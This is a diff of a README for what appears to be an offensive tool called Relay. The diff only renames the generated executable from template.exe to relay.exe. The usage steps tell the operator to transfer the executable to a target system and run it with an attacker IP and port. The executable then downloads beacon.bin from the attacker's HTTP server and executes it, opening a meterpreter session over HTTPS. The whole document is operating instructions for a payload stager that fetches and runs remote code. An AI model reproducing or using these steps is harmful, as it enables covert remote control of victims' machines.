DorArlaki/Relay/README.md

 1. Run the Python script and follow the on-screen instructions.
 2. Enter your IP address, port, and the path to the certificate file when prompted.
-3. The script will generate an executable file named `template.exe`.
+3. The script will generate an executable file named `relay.exe`.
-4. Transfer the `template.exe` file to the target system.
+4. Transfer the `relay.exe` file to the target system.
-5. On the target system, open a command prompt and navigate to the directory containing `template.exe`.
+5. On the target system, open a command prompt and navigate to the directory containing `relay.exe`.
-6. Run the following command: `template.exe <attacker_ip> <attacker_port> beacon.bin`.
+6. Run the following command: `relay.exe <attacker_ip> <attacker_port> beacon.bin`.
 Replace `<attacker_ip>` and `<attacker_port>` with the IP address and port specified during script execution.
 7. On the attacker machine, navigate to the directory containing `beacon.bin`.
 8. Start a simple HTTP server using the command: `python3 -m http.server`.
 9. The target system will download `beacon.bin` from the HTTP server and execute it, establishing a meterpreter session over HTTPS.